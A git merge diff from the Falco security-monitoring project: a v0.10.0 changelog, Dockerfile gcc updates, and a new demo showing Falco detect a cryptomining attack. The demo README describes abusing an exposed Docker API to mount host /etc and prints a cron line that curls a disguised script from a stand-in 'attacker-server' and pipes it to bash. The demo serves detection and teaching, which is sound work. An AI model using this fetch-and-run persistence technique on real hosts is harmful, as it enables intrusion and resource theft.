Merge branch 'dev'

.travis.yml

@@ -17,6 +17,7 @@ install:
     - curl -Lo avocado-36.0-tar.gz https://github.com/avocado-framework/avocado/archive/36.0lts.tar.gz
     - tar -zxvf avocado-36.0-tar.gz
     - cd avocado-36.0lts
+    - sed -e 's/libvirt-python>=1.2.9/libvirt-python>=1.2.9,<4.1.0/' < requirements.txt  > /tmp/requirements.txt && mv /tmp/requirements.txt ./requirements.txt
     - sudo -H pip install -r requirements.txt
     - sudo python setup.py install
     - cd ../falco

CHANGELOG.md

@@ -2,6 +2,48 @@
 
 This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
 
+## v0.10.0
+
+Released 2018-04-24
+
+## Major Changes
+
+* **Rules Directory Support**: Falco will read rules files from `/etc/falco/rules.d` in addition to `/etc/falco/falco_rules.yaml` and `/etc/falco/falco_rules.local.yaml`. Also, when the argument to `-r`/falco.yaml `rules_file` is a directory, falco will read rules files from that directory. [[#348](https://github.com/draios/falco/pull/348)] [[#187](https://github.com/draios/falco/issues/187)]
+* Properly support all syscalls (e.g. those without parameter extraction by the kernel module) in falco conditions, so they can be included in `evt.type=<name>` conditions. [[#352](https://github.com/draios/falco/pull/352)]
+* When packaged as a container, start building kernel module with gcc 5.0 instead of gcc 4.9. [[#331](https://github.com/draios/falco/pull/331)]
+* New example puppet module for falco. [[#341](https://github.com/draios/falco/pull/341)] [[#115](https://github.com/draios/falco/issues/115)]
+* When signaled with `USR1`, falco will close/reopen log files. Include a [logrotate](https://github.com/logrotate/logrotate) example that shows how to use this feature for log rotation. [[#347](https://github.com/draios/falco/pull/347)] [[#266](https://github.com/draios/falco/issues/266)]
+* To improve resource usage, further restrict the set of system calls available to falco [[#351](https://github.com/draios/falco/pull/351)] [[draios/sysdig#1105](https://github.com/draios/sysdig/pull/1105)]
+
+## Minor Changes
+
+* Add gdb to the development Docker image (sysdig/falco:dev) to aid in debugging. [[#323](https://github.com/draios/falco/pull/323)]
+* You can now specify -V multiple times on the command line to validate multiple rules files at once. [[#329](https://github.com/draios/falco/pull/329)]
+* When run with `-v`, falco will print *dangling* macros/lists that are not used by any rules. [[#329](https://github.com/draios/falco/pull/329)]
+* Add an example demonstrating cryptomining attack that exploits an open docker daemon using host mounts. [[#336](https://github.com/draios/falco/pull/336)]
+* New falco.yaml option `json_include_output_property` controls whether the formatted string "output" is included in the json object when json output is enabled. [[#342](https://github.com/draios/falco/pull/342)]
+* Centralize testing event types for consideration by falco into a single function [[draios/sysdig#1105](https://github.com/draios/sysdig/pull/1105)) [[#356](https://github.com/draios/falco/pull/356)]
+* If a rule has an attribute `warn_evttypes`, falco will not complain about `evt.type` restrictions on that rule [[#355](https://github.com/draios/falco/pull/355)]
+* When run with `-i`, print all ignored events/syscalls and exit. [[#359](https://github.com/draios/falco/pull/359)]
+
+## Bug Fixes
+
+* Minor bug fixes to k8s daemonset configuration. [[#325](https://github.com/draios/falco/pull/325)] [[#296](https://github.com/draios/falco/pull/296)] [[#295](https://github.com/draios/falco/pull/295)]
+* Ensure `--validate` can be used interchangeably with `-V`. [[#334](https://github.com/draios/falco/pull/334)] [[#322](https://github.com/draios/falco/issues/322)]
+* Rule conditions like `fd.net` can now be used with the `in` operator e.g. `evt.type=connect and fd.net in ("127.0.0.1/24")`. [[draios/sysdig#1091](https://github.com/draios/sysdig/pull/1091)] [[#343](https://github.com/draios/falco/pull/343)]
+* Ensure that `keep_alive` can be used both with file and program output at the same time. [[#335](https://github.com/draios/falco/pull/335)]
+* Make it possible to append to a skipped macro/rule without falco complaining [[#346](https://github.com/draios/falco/pull/346)] [[#305](https://github.com/draios/falco/issues/305)]
+* Ensure rule order is preserved even when rules do not contain any `evt.type` restriction. [[#354](https://github.com/draios/falco/issues/354)] [[#355](https://github.com/draios/falco/pull/355)]
+
+## Rule Changes
+
+* Make it easier to extend the `Change thread namespace` rule via a `user_known_change_thread_namespace_binaries` list. [[#324](https://github.com/draios/falco/pull/324)]
+* Various FP fixes from users. [[#321](https://github.com/draios/falco/pull/321)] [[#326](https://github.com/draios/falco/pull/326)] [[#344](https://github.com/draios/falco/pull/344)] [[#350](https://github.com/draios/falco/pull/350)]
+* New rule `Disallowed SSH Connection` detects attempts ssh connection attempts to hosts outside of an expected set. In order to be effective, you need to override the macro `allowed_ssh_hosts` in a user rules file. [[#321](https://github.com/draios/falco/pull/321)]
+* New rule `Unexpected K8s NodePort Connection` detects attempts to contact the K8s NodePort range from a program running inside a container. In order to be effective, you need to override the macro `nodeport_containers` in a user rules file. [[#321](https://github.com/draios/falco/pull/321)]
+* Improve `Modify binary dirs` rule to work with new syscalls [[#353](https://github.com/draios/falco/pull/353)]
+* New rule `Unexpected UDP Traffic` checks for udp traffic not on a list of expected ports. Somewhat FP-prone, so it must be explicitly enabled by overriding the macro `do_unexpected_udp_check` in a user rules file. [[#320](https://github.com/draios/falco/pull/320)] [[#357](https://github.com/draios/falco/pull/357)]
+
 ## v0.9.0
 
 Released 2018-01-18

README.md

@@ -2,7 +2,7 @@
 
 #### Latest release
 
-**v0.9.0**
+**v0.10.0**
 Read the [change log](https://github.com/draios/falco/blob/dev/CHANGELOG.md)
 
 Dev Branch: [![Build Status](https://travis-ci.org/draios/falco.svg?branch=dev)](https://travis-ci.org/draios/falco)<br />

cpack/debian/conffiles

@@ -1,4 +1,4 @@
 /etc/falco/falco.yaml
 /etc/falco/falco_rules.yaml
-/etc/falco/application_rules.yaml
+/etc/falco/rules.available/application_rules.yaml
 /etc/falco/falco_rules.local.yaml

docker/dev/Dockerfile

@@ -14,8 +14,7 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
 ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
 
-RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
- && apt-get update \
+RUN apt-get update \
  && apt-get install -y --no-install-recommends \
 	bash-completion \
 	curl \
@@ -24,18 +23,11 @@ RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources
 	ca-certificates \
 	gcc \
 	gcc-5 \
-	gcc-4.9 && rm -rf /var/lib/apt/lists/*
-
-# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
-# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
-# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
-# by symlinking it to 4.9
-
-RUN rm -rf /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
+	gdb && rm -rf /var/lib/apt/lists/*
+
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
 
 RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
  && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \

docker/event-generator/event_generator.cpp

@@ -296,23 +296,21 @@ void system_user_interactive() {
 }
 
 void network_activity() {
-	printf("Opening a listening socket on port 8192...\n");
+	printf("Connecting a udp socket to 10.2.3.4:8192...\n");
 	int rc;
 	int sock = socket(PF_INET, SOCK_DGRAM, 0);
 	struct sockaddr_in localhost;
 
 	localhost.sin_family = AF_INET;
 	localhost.sin_port = htons(8192);
-	inet_aton("127.0.0.1", &(localhost.sin_addr));
+	inet_aton("10.2.3.4", &(localhost.sin_addr));
 
-	if((rc = bind(sock, (struct sockaddr *) &localhost, sizeof(localhost))) != 0)
+	if((rc = connect(sock, (struct sockaddr *) &localhost, sizeof(localhost))) != 0)
 	{
 		fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
 		return;
 	}
 
-	listen(sock, 1);
-
 	close(sock);
 }
 

docker/local/Dockerfile

@@ -14,8 +14,7 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
 ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
 
-RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
- && apt-get update \
+RUN apt-get update \
  && apt-get install -y --no-install-recommends \
 	bash-completion \
 	curl \
@@ -24,19 +23,11 @@ RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources
 	ca-certificates \
 	gcc \
 	gcc-5 \
-	gcc-4.9 \
 	dkms && rm -rf /var/lib/apt/lists/*
 
-# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
-# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
-# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
-# by symlinking it to 4.9
-
-RUN rm -rf /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
 
 RUN ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
 

docker/stable/Dockerfile

@@ -14,28 +14,19 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
 ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
 
-RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
- && apt-get update \
+RUN apt-get update \
  && apt-get install -y --no-install-recommends \
 	bash-completion \
 	curl \
 	jq \
 	ca-certificates \
 	gnupg2 \
 	gcc \
-	gcc-5 \
-	gcc-4.9 && rm -rf /var/lib/apt/lists/*
-
-# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
-# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
-# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
-# by symlinking it to 4.9
-
-RUN rm -rf /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
- && ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
+	gcc-5 && rm -rf /var/lib/apt/lists/*
+
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
 
 RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
  && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \

examples/bad-mount-cryptomining/README.md

@@ -0,0 +1,117 @@
+# Demo of Falco Detecting Cryptomining Exploit
+
+## Introduction
+
+Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Sysdig Falco.
+
+Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
+
+## Requirements
+
+In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
+
+## Example architecture
+
+The example consists of the following:
+
+* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
+* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker.
+* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
+
+All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
+
+A separate container is created to launch the attack:
+
+* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
+
+## Example Walkthrough
+
+### Start everything using docker-compose
+
+To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
+
+Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
+
+You will see fairly verbose output from dockerd:
+
+```
+host-machine_1     | crond: crond (busybox 1.27.2) started, log level 6
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
+```
+
+When you see log output like the following, you know that falco is started and ready:
+
+```
+falco_1            | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
+falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
+falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
+```
+
+### Launch malicious container
+
+To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
+
+The script `launch_malicious_container.sh` performs the necessary POSTs:
+
+* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
+* `http://localhost:2375/containers/create?&name=docker123321-mysql`
+* `http://localhost:2375/containers/docker123321-mysql/start`
+
+Run the script via `bash launch_malicious_container.sh`.
+
+### Examine cron output as malicious software is installed & run
+
+`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
+
+```
+* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
+```
+
+It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg))  from `attacker-server` and run it.
+
+You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
+
+```
+CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS               NAMES
+68ed578bd034        alpine:latest       "/bin/sh -c 'echo '*…"   About a minute ago   Up About a minute                       docker123321-mysql
+```
+
+Once the cron job runs, you will see output like the following:
+
+```
+host-machine_1     | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
+host-machine_1     | ***Checking for existing Miner program
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
+host-machine_1     | ***Killing competing Miner programs
+host-machine_1     | ***Reinstalling cron job to run Miner program
+host-machine_1     | ***Configuring Miner program
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
+host-machine_1     | ***Configuring system for Miner program
+host-machine_1     | vm.nr_hugepages = 9
+host-machine_1     | ***Running Miner program
+host-machine_1     | ***Ensuring Miner program is alive
+host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
+host-machine_1     | /var/tmp
+host-machine_1     | runing.....
+host-machine_1     | ***Ensuring Miner program is alive
+host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
+host-machine_1     | /var/tmp
+host-machine_1     | runing.....
+```
+
+### Observe Falco detecting malicious activity
+
+To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
+
+```
+falco_1            | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
+falco_1            | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
+```
+
+### Cleanup
+
+To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.
+

examples/bad-mount-cryptomining/attacker-nginx.conf

@@ -0,0 +1,14 @@
+server {
+    listen       8220;
+    server_name  localhost;
+
+    location / {
+        root   /usr/share/nginx/html;
+        index  index.html index.htm;
+    }
+
+    error_page   500 502 503 504  /50x.html;
+    location = /50x.html {
+        root   /usr/share/nginx/html;
+    }
+}

examples/bad-mount-cryptomining/attacker_files/config_1.json

@@ -0,0 +1 @@
+{"config": "some-bitcoin-miner-config-goes-here"}